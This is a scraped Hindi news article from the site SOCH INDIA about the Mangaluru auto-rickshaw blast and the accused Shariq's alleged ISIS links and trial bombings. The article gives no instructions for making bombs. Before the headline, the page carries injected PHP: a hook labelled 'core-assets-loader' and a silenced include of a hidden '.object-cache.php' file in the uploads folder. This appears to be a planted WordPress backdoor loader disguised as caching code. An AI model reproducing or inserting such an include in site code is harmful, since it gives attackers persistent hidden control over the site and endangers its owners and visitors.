add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मंगलौर ऑटो ब्लास्ट में बड़ा खुलासा, ISIS हैंडलर्स के संपर्क में था मुख्य आरोपी शारिक, बड़ी साजिश को अंजाम देना था मकसद – SOCH INDIA
Menu

देश
मंगलौर ऑटो ब्लास्ट में बड़ा खुलासा, ISIS हैंडलर्स के संपर्क में था मुख्य आरोपी शारिक, बड़ी साजिश को अंजाम देना था मकसद

nobanner

कर्नाटक के मंगलुरु शहर में 19 नवंबर की शाम को हुए ऑटो ब्लास्ट के मामले में पुलिस ने मुख्य आरोपी की पहचान कर ली है. इस ब्लास्ट में ऑटो चालक पुरुषोत्तम के साथ-साथ शारिक नाम का यह युवक भी झुलस गया था. फिलहाल इन दोनों का इलाज मंगलुरु के एक अस्पताल में किया जा रहा है. शारिक के बारे में पुलिस ने बताया कि वह शरीक इस्लामिक स्टेट (ISIS) के हेंडलर्स के संपर्क में था और इससे पहले भी शिवमोग्गा में बम ब्लास्ट का ट्रायल कर चुका है.

वहीं, ब्लास्ट मामले को लेकर एडीजीपी (ADGP) आलोक कुमार ने बताया कि 19 नवंबर की रात करीब 7:40 बजे मेंगलुरु शहर के बाहर एक कम तीव्रता वाला विस्फोट एक ऑटो में हुआ था. घटना में यात्री और चालकों झुलस गए. ऑटो चालक की पहचान पुरुषोत्तम पुजारी और यात्री की पहचान शारिक के रूप में हुई है.

मोहम्मद शरीक के खिलाफ तीन मामले दर्ज

आलोक कुमार ने बताया कि आरोपी के ख़िलाफ़ तीन मामले दर्ज़ हैं, दो मेंगलुरु शहर में और एक शिवमोग्गा में. आरोपी के ख़िलाफ़ दो मामलों में UAPA के तहत मामला दर्ज़ किया गया है और तीसरे मामले में वह वांछित था. आरोपी लंबे समय से फरार चल रहा था.

जंगल में किया था ट्रायल ब्लास्ट

19 सितंबर को इस बात का पता चला था कि शरिक ने अपने दो और साथियों के साथ तुंग भद्रा नदी के किनारे एक जंगल में ट्रायल ब्लास्ट भी किया था. इस घटना के बाद 20 नवंबर को पुलिस ने माज मुनीर और सैयद यासीन को गिरफ्तार कर लिया लेकिन शकिर पुलिस को चकमा देकर फरार होने में कामयाब रहा. इसके बाद वह मैसूरू में चोरी के आधार कार्ड से किराए पर एक घर लेकर वहां बम बनाने की प्रेक्टिस कर रहा था.